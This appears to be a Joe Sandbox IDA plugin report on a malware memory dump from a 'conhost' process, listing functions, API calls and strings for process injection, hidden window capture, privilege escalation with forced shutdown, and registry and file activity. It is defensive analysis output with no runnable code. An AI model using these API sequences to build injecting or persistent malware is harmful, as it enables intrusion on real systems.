Part of subcall function 001A54A9: IntersectRect.USER32(?,?,-00000114), ref: 001A5538
Part of subcall function 001A54A9: IntersectRect.USER32(?,?,-00000114), ref: 001A558E
Part of subcall function 001A54A9: GetDC.USER32(00000000), ref: 001A55D2
Part of subcall function 001A54A9: CreateCompatibleDC.GDI32(00000000), ref: 001A55E3
Part of subcall function 001A54A9: ReleaseDC.USER32(00000000,00000000), ref: 001A55ED
Part of subcall function 001A54A9: SelectObject.GDI32(00000000,?), ref: 001A5602
Part of subcall function 001A54A9: DeleteDC.GDI32(00000000), ref: 001A5610
Part of subcall function 001A54A9: TlsSetValue.KERNEL32(?), ref: 001A565B
Part of subcall function 001A54A9: EqualRect.USER32(?,?), ref: 001A5675
Part of subcall function 001A54A9: SaveDC.GDI32(00000000), ref: 001A5680
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A569B
Part of subcall function 001A54A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 001A56BB
Part of subcall function 001A54A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 001A56CD
Part of subcall function 001A54A9: RestoreDC.GDI32(00000000,?), ref: 001A56E4
Part of subcall function 001A54A9: SaveDC.GDI32(00000000), ref: 001A5706
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A571C
Part of subcall function 001A54A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 001A5735
Part of subcall function 001A54A9: RestoreDC.GDI32(00000000,?), ref: 001A5743
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 001A5756
Part of subcall function 001A54A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 001A5766
Part of subcall function 001A54A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 001A5778
Part of subcall function 001A54A9: TlsSetValue.KERNEL32(00000000), ref: 001A5792
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A57B2
Part of subcall function 001A54A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 001A57CE
Part of subcall function 001A54A9: SelectObject.GDI32(00000000,?), ref: 001A57E4
Part of subcall function 001A54A9: DeleteDC.GDI32(00000000), ref: 001A57EB
Part of subcall function 001A54A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 001A5813
Part of subcall function 001A54A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 001A5829

SetEvent.KERNEL32(001C2868,?,00000001), ref: 001A5C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 001A5C76

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AB0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001AB0B3
ReleaseMutex.KERNEL32(?), ref: 001AB0E7
IsWindow.USER32(?), ref: 001AB0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 001AB108
SendMessageW.USER32(?,00000215,00000000,?), ref: 001AB110

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A98B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 001B74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,001A7194,?,?,00000104,.exe,00000000), ref: 001B74F4
Part of subcall function 001B74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,001A7194,?,?,00000104), ref: 001B7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 001A991B
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 001A996B

Part of subcall function 001B8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001B8B23
Part of subcall function 001B8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B8B4A
Part of subcall function 001B8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 001B8B94
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 001B8BC1
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?), ref: 001B8BF1
Part of subcall function 001B8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 001B8C1F
Part of subcall function 001B8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 001B8C31

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

#, xrefs: 001A9951
&, xrefs: 001A994A

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A9009, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 94

APIs

Part of subcall function 001B74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,001A7194,?,?,00000104,.exe,00000000), ref: 001B74F4
Part of subcall function 001B74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,001A7194,?,?,00000104), ref: 001B7575

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 001A906B
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 001A90BB

Part of subcall function 001B8AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 001B8B23
Part of subcall function 001B8AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001B8B4A
Part of subcall function 001B8AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 001B8B94
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 001B8BC1
Part of subcall function 001B8AE4: Sleep.KERNEL32(00000000,?,?), ref: 001B8BF1
Part of subcall function 001B8AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 001B8C1F
Part of subcall function 001B8AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 001B8C31

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Strings

&, xrefs: 001A90A1
#, xrefs: 001A9093

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B2828, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52

APIs

Part of subcall function 001B35C6: MultiByteToWideChar.KERNEL32(001B2884,00000000,?,001B1FF2,?,7718F8FF,001B2884,00000000,00000032,?,7718F8FF,00000000), ref: 001B35DD

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

PathRenameExtensionW.SHLWAPI(?,.dat), ref: 001B28A1

Strings

.dat, xrefs: 001B289B
C:\Users\admin\AppData\Roaming, xrefs: 001B2870, 001B2888
SOFTWARE\Microsoft, xrefs: 001B2855

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AE0FB, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47

APIs

GetCurrentThreadId.KERNEL32(7718F8FF), ref: 001AE108
GetThreadDesktop.USER32(00000000), ref: 001AE10F
GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 001AE128

Part of subcall function 001ADD09: TlsAlloc.KERNEL32(001C2868,00000000,0000018C,00000000,00000000), ref: 001ADD22
Part of subcall function 001ADD09: RegisterWindowMessageW.USER32(?,84889911,?,00000000), ref: 001ADD4A
Part of subcall function 001ADD09: CreateEventW.KERNEL32(001C2C30,00000001,00000000,?,84889912,?,00000001), ref: 001ADD74
Part of subcall function 001ADD09: CreateMutexW.KERNEL32(001C2C30,00000000,?,18782822,?,00000001), ref: 001ADD97
Part of subcall function 001ADD09: CreateFileMappingW.KERNEL32(00000000,001C2C30,00000004,00000000,03D09128,?,9878A222,?,00000001), ref: 001ADDC2
Part of subcall function 001ADD09: MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 001ADDD8
Part of subcall function 001ADD09: GetDC.USER32(00000000), ref: 001ADDF5
Part of subcall function 001ADD09: GetDeviceCaps.GDI32(00000000,00000008), ref: 001ADE15
Part of subcall function 001ADD09: GetDeviceCaps.GDI32(?,0000000A), ref: 001ADE1F
Part of subcall function 001ADD09: CreateCompatibleBitmap.GDI32(?,00000000,00000000), ref: 001ADE32
Part of subcall function 001ADD09: ReleaseDC.USER32(00000000,?), ref: 001ADE56
Part of subcall function 001ADD09: CreateMutexW.KERNEL32(001C2C30,00000000,?,1898B122,?,00000001,001C28B8,?,00000102,001C28A4,001C2E70,00000010,?,?), ref: 001ADF00
Part of subcall function 001ADD09: GetDC.USER32(00000000), ref: 001ADF15
Part of subcall function 001ADD09: CreateCompatibleDC.GDI32(00000000), ref: 001ADF23
Part of subcall function 001ADD09: CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 001ADF3A
Part of subcall function 001ADD09: SelectObject.GDI32(00000000,00000000), ref: 001ADF4D
Part of subcall function 001ADD09: ReleaseDC.USER32(00000000,00000001), ref: 001ADF65

Part of subcall function 001ADF74: DeleteObject.GDI32(00000000), ref: 001ADF87
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADF97
Part of subcall function 001ADF74: TlsFree.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFA2
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADFB0
Part of subcall function 001ADF74: UnmapViewOfFile.KERNEL32(00000000,00000000,001C2868,00000000,001AE17E,00000000,00000000,0000004C,2937498D,?,00000000), ref: 001ADFBA
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001ADFC7
Part of subcall function 001ADF74: SelectObject.GDI32(00000000,00000000), ref: 001ADFE1
Part of subcall function 001ADF74: DeleteObject.GDI32(00000000), ref: 001ADFF2
Part of subcall function 001ADF74: DeleteDC.GDI32(00000000), ref: 001ADFFF
Part of subcall function 001ADF74: CloseHandle.KERNEL32(00000000), ref: 001AE010
Part of subcall function 001ADF74: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001AE01F
Part of subcall function 001ADF74: PostThreadMessageW.USER32(00000000,00000012,00000000,00000000), ref: 001AE038

Strings

N, xrefs: 001AE132

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B89C2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathSkipRootW.SHLWAPI(?), ref: 001B89CD
GetFileAttributesW.KERNEL32(?,?,00000000,001BD261,?,?,?,?,?), ref: 001B89F5
CreateDirectoryW.KERNEL32(?,00000000,?,00000000,001BD261,?,?,?,?,?), ref: 001B8A03

Strings

.exe, xrefs: 001B89C9

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A5ECF, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(001C25D0), ref: 001A5F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 001A5F23

Part of subcall function 001B89C2: PathSkipRootW.SHLWAPI(?), ref: 001B89CD
Part of subcall function 001B89C2: GetFileAttributesW.KERNEL32(?,?,00000000,001BD261,?,?,?,?,?), ref: 001B89F5
Part of subcall function 001B89C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,001BD261,?,?,?,?,?), ref: 001B8A03

Part of subcall function 001B6A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 001B6A5B
Part of subcall function 001B6A3C: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 001B6A77
Part of subcall function 001B6A3C: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 001B6A8E
Part of subcall function 001B6A3C: LocalFree.KERNEL32(00000000), ref: 001B6A9D

GetFileAttributesW.KERNEL32(001C23C8,001C25D0,001C25D0,00000000,00020000,001A69C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 001A5F46

Part of subcall function 001B2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 001B28A1

Strings

.tmp, xrefs: 001A5F1D

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AF367, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 001AF3CC

Part of subcall function 001BD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 001BD34A
Part of subcall function 001BD325: PathRemoveFileSpecW.SHLWAPI(?), ref: 001BD35D
Part of subcall function 001BD325: SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 001BD39B
Part of subcall function 001BD325: CharToOemW.USER32(?,?), ref: 001BD3B7
Part of subcall function 001BD325: CharToOemW.USER32(?,?), ref: 001BD3C6
Part of subcall function 001BD325: ExitProcess.KERNEL32(00000000), ref: 001BD41C

Part of subcall function 001AE959: CreateMutexW.KERNELBASE(001C2C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,001A4E69,?,?,?,743C152E,00000002), ref: 001AE97F

ExitWindowsEx.USER32(00000014,80000000), ref: 001AF3DF

Part of subcall function 001B4A87: GetCurrentThread.KERNEL32(00000020,00000000,001BC9A1,00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A97
Part of subcall function 001B4A87: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4A9E
Part of subcall function 001B4A87: OpenProcessToken.ADVAPI32(000000FF,00000020,001BC9A1,?,?,?,?,001BC9A1,SeTcbPrivilege), ref: 001B4AB0
Part of subcall function 001B4A87: LookupPrivilegeValueW.ADVAPI32(00000000,001BC9A1,?), ref: 001B4AD4
Part of subcall function 001B4A87: AdjustTokenPrivileges.ADVAPI32(001BC9A1,00000000,00000001,00000000,00000000,00000000), ref: 001B4AE9
Part of subcall function 001B4A87: GetLastError.KERNEL32 ref: 001B4AF3
Part of subcall function 001B4A87: CloseHandle.KERNEL32(001BC9A1), ref: 001B4B02

Strings

, xrefs: 001AF383
SeShutdownPrivilege, xrefs: 001AF3AB

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B87C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 001B87D7

Part of subcall function 001B46F4: GetTickCount.KERNEL32(001B8766,?), ref: 001B46F4

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 001B8829

Strings

%s%08x, xrefs: 001B87F2
tmp, xrefs: 001B87ED

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B1E2D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 001B1E4B
PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 001B1E5A
GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 001B1E6E

Strings

C:\Users\admin\AppData\Roaming, xrefs: 001B1E3D, 001B1E42, 001B1E59

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B4BC2, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,001B1DBB,00000000,001B22ED), ref: 001B4BCF
GetProcAddress.KERNEL32(00000000,IsWow64Process,?,?,001B1DBB,00000000,001B22ED), ref: 001B4BDF

Strings

IsWow64Process, xrefs: 001B4BD9
kernel32.dll, xrefs: 001B4BCA

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BA24F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22

APIs

EnterCriticalSection.KERNEL32(001C3F24), ref: 001BA265
SetEvent.KERNEL32(?), ref: 001BA286
LeaveCriticalSection.KERNEL32(001C3F24), ref: 001BA28D

Strings

3, xrefs: 001BA256

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B0AA1, Relevance: 6.3, APIs: 4, Instructions: 303

APIs

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0C73
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0C93
RegCloseKey.ADVAPI32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0CA6
GetLocalTime.KERNEL32(?,?,00000000,00000001,?,?,00000001,?,00004E27,10000000), ref: 001B0CB5

Part of subcall function 001B3346: HeapAlloc.KERNEL32(00000008,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?,?), ref: 001B3368
Part of subcall function 001B3346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,001B36F5,?,?,00000000,001B41E1,?,001B2070,?,?,?,001B4191,?,?), ref: 001B3379

Part of subcall function 001B4660: CryptAcquireContextW.ADVAPI32(001B8C87,00000000,00000000,00000001,F0000040,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B4679
Part of subcall function 001B4660: CryptCreateHash.ADVAPI32(001B8C87,00008003,00000000,00000000,00000030,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B4691
Part of subcall function 001B4660: CryptHashData.ADVAPI32(00000030,00000010,001B8C87,00000000,?,001B8C87), ref: 001B46AD
Part of subcall function 001B4660: CryptGetHashParam.ADVAPI32(00000030,00000002,00000030,00000010,00000000,?,001B8C87), ref: 001B46C5
Part of subcall function 001B4660: CryptDestroyHash.ADVAPI32(00000030,?,001B8C87), ref: 001B46DC
Part of subcall function 001B4660: CryptReleaseContext.ADVAPI32(001B8C87,00000000,?,001B8C87,?,00000030,?,?,?,001B91A0,001C3EC0), ref: 001B46E6

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AA088, Relevance: 6.2, APIs: 4, Instructions: 184

APIs

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 001AA12E
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001AA159
RegCloseKey.ADVAPI32(?), ref: 001AA28F

Part of subcall function 001B74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,001A7194,?,?,00000104,.exe,00000000), ref: 001B74F4
Part of subcall function 001B74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,001A7194,?,?,00000104), ref: 001B7575

Part of subcall function 001B7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,001B9E26,?,?), ref: 001B75AD

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 001AA27C

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001AA61C, Relevance: 6.2, APIs: 4, Instructions: 176

APIs

Part of subcall function 001B338B: HeapAlloc.KERNEL32(00000008,-00000004,001B4B59,00000000,?,?,?,001B1E08,00000000,001B22ED,?,?,00000000), ref: 001B339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 001AA6AA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 001AA6D5
RegCloseKey.ADVAPI32(?), ref: 001AA80C

Part of subcall function 001B74DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,001A7194,?,?,00000104,.exe,00000000), ref: 001B74F4
Part of subcall function 001B74DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,001A7194,?,?,00000104), ref: 001B7575

Part of subcall function 001B7595: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,001B9E26,?,?), ref: 001B75AD

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 001AA7F9

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001BB265, Relevance: 6.1, APIs: 4, Instructions: 129

APIs

SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 001BB28C

Part of subcall function 001B8C40: PathCombineW.SHLWAPI(001B1F45,001B1F45,?), ref: 001B8C5F

GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 001BB2E0

Part of subcall function 001B40AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 001B40CF

GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 001BB343
GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 001BB36F

Part of subcall function 001BB3EC: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 001BB437
Part of subcall function 001BB3EC: WriteFile.KERNEL32(001BB3D4,?,00000146,?,00000000), ref: 001BB475
Part of subcall function 001BB3EC: WriteFile.KERNEL32(001BB3D4,?,00000000,?,00000000), ref: 001BB499
Part of subcall function 001BB3EC: FlushFileBuffers.KERNEL32(001BB3D4), ref: 001BB4AD
Part of subcall function 001BB3EC: CloseHandle.KERNEL32(001BB3D4), ref: 001BB4B6

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B7D14, Relevance: 6.1, APIs: 4, Instructions: 94

APIs

IsBadReadPtr.KERNEL32(001A0000,?), ref: 001B7D30
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 001B7D4E
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,001A0000,?,?,00000000,?,00000000), ref: 001B7DE0

Part of subcall function 001B33BB: HeapFree.KERNEL32(00000000,00000000,001B4BB2), ref: 001B33CE

VirtualFreeEx.KERNEL32(?,?,00000000,00008000,001A0000,?,?,00000000,?,00000000), ref: 001B7E05

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B2542, Relevance: 6.1, APIs: 4, Instructions: 87

APIs

Part of subcall function 001B7D14: IsBadReadPtr.KERNEL32(001A0000,?), ref: 001B7D30
Part of subcall function 001B7D14: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,00000000,?,00000000), ref: 001B7D4E
Part of subcall function 001B7D14: WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,001A0000,?,?,00000000,?,00000000), ref: 001B7DE0
Part of subcall function 001B7D14: VirtualFreeEx.KERNEL32(?,?,00000000,00008000,001A0000,?,?,00000000,?,00000000), ref: 001B7E05

DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 001B2574
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,001B316D,?,00000000,?,?,00000000), ref: 001B25AB
WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,001B316D,?,00000000,?,?,00000000), ref: 001B25CB

Part of subcall function 001B1D15: DuplicateHandle.KERNEL32(000000FF,00000000,?,00000000,00000000,00000000,00000002), ref: 001B1D3B
Part of subcall function 001B1D15: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,00000000,?,001B25E9,00000000,?,?,?,?,001B316D,?), ref: 001B1D4F
Part of subcall function 001B1D15: DuplicateHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 001B1D69

VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,001B316D,?,00000000), ref: 001B261A

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B984E, Relevance: 6.1, APIs: 4, Instructions: 86

APIs

CoCreateInstance.OLE32(001A15B0,00000000,00004401,001A15A0,?), ref: 001B9874
#8.OLEAUT32(?,?,?,?,?,?,?,?,?,001A85BE,?,?), ref: 001B98C0
#2.OLEAUT32(?,?,?,?,?,?,?,?,?,001A85BE,?,?), ref: 001B98D0
#9.OLEAUT32(?,?,?,?,?,?,?,?,?,?,001A85BE,?,?), ref: 001B9909

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001B9372, Relevance: 6.1, APIs: 4, Instructions: 84

APIs

Part of subcall function 001B86BF: SetFilePointerEx.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 001B86D4

Part of subcall function 001B869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 001B86B1

WriteFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 001B93F3
WriteFile.KERNEL32(?,00000005,00A00000,00000005,00000000), ref: 001B940C
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 001B9430
FlushFileBuffers.KERNEL32(?), ref: 001B9438

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1a0000_conhost.jbxd

Function 001A5B28, Relevance: 6.1, APIs: 4, Instructions: 69

APIs

WaitForSingleObject.KERNEL32(?,00000000), ref: 001A5B40

Part of subcall function 001B4DCA: CloseHandle.KERNEL32(00000000), ref: 001B4DD9
Part of subcall function 001B4DCA: CloseHandle.KERNEL32(00000000), ref: 001B4DE2

Part of subcall function 001B2828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 001B28A1

ResetEvent.KERNEL32(?,?,00000000,00000044,2937498D,?,00000000,00000001), ref: 001A5B9A
WaitForSingleObject.KERNEL32(?,000003E8), ref: 001A5BD6
TerminateProcess.KERNEL32(?,00000000), ref: 001A5BE3

Memory Dump Source

Source File: 00000009.00000002.1766777843.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: true
